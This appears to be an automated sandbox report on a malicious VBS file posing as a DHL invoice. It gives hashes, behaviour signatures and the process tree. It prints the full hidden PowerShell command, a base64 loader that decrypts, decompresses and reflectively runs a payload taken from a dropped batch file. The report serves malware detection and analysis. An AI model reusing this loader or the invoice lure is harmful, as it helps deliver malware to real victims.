Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 11:49

General

  • Target

    DHL-INVOICE_10094519030720250009.vbs

  • Size

    98KB

  • MD5

    33e243596a995b134c3862d2746d3a3a

  • SHA1

    dc51212190c79cd89cfb6a629e3f7299673fa003

  • SHA256

    d28c3371542ec4275020001c02ae26f41d0a11109375cffee6d22f56b9fc5259

  • SHA512

    545089424ea61e9c3871a75170d8695331bd991bf7fe8d10a5dd9a136db8b2015f9083faf86023c751550a9faa44ceb6ebfe5b6ae2d593d4261678eaa5a739c5

  • SSDEEP

    1536:PxfjFMLSEGgcX4XTA66MrhZLVzsBjuBl6D584BuvQNkHGwhJiz1U8x8x0yCzkIXG:PxGfjjLVzsBKB+uvNHTAaw8CyWVG

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL-INVOICE_10094519030720250009.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskbG95b28gPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGxveW9vKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRsb3lvbyIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRsb3lvbywgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkbG95b28iIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24geXB2anooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0I1OTMwTk16K2RyZWpZMFNUbTcyRWlyazdtWUtyV0EzYkoxRmFyT2FtVmM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2lDeUF0MytKQTFhQnNFeDliOWd6NGc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gdGl3cmkoJHBhcmFtX3Zhcil7CSR0em9oZz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkZGN4YWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkeHZ6ZnE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkdHpvaGcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHh2emZxLkNvcHlUbygkZGN4YWkpOwkkeHZ6ZnEuRGlzcG9zZSgpOwkkdHpvaGcuRGlzcG9zZSgpOwkkZGN4YWkuRGlzcG9zZSgpOwkkZGN4YWkuVG9BcnJheSgpO31mdW5jdGlvbiBucnRnbSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJGtyZWZ3PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGxidG5pPSRrcmVmdy5FbnRyeVBvaW50OwkkbGJ0bmkuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGxveW9vOyR2cmdqej1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGxveW9vKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWlrIGluICR2cmdqeikgewlpZiAoJHVpay5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGl3em14PSR1aWsuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JG9uZW15PVtzdHJpbmdbXV0kaXd6bXguU3BsaXQoJ1wnKTskdndkaXE9dGl3cmkgKHlwdmp6IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJG9uZW15WzBdKSkpOyRqY2ZwYz10aXdyaSAoeXB2anogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkb25lbXlbMV0pKSk7bnJ0Z20gJHZ3ZGlxICRudWxsO25ydGdtICRqY2ZwYyAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2716

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat

    Filesize

    88KB

    MD5

    3d0e294629c4b980cd16801696dc84cc

    SHA1

    24b01453f405ca41d30c484cc7ef72a2d082d54a

    SHA256

    d4f97ee756677f0c7e58b5528f4b70b58e8fd5c9929af6f9148d9e3c3df5ae2a

    SHA512

    f146cfe93b3bdd562542ef1150f81c0d8c3c852d78b770b77a47815e4b99005aba8e2a55134d6b7ed0be192402ca7b6ceb831e3b2bc66a599a20eb15c6e5ea5f

  • memory/2716-13-0x00000000746D1000-0x00000000746D2000-memory.dmp

    Filesize

    4KB

  • memory/2716-14-0x00000000746D0000-0x0000000074C7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2716-15-0x00000000746D0000-0x0000000074C7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2716-16-0x00000000746D0000-0x0000000074C7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2716-17-0x00000000746D0000-0x0000000074C7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2716-18-0x00000000746D0000-0x0000000074C7B000-memory.dmp

    Filesize

    5.7MB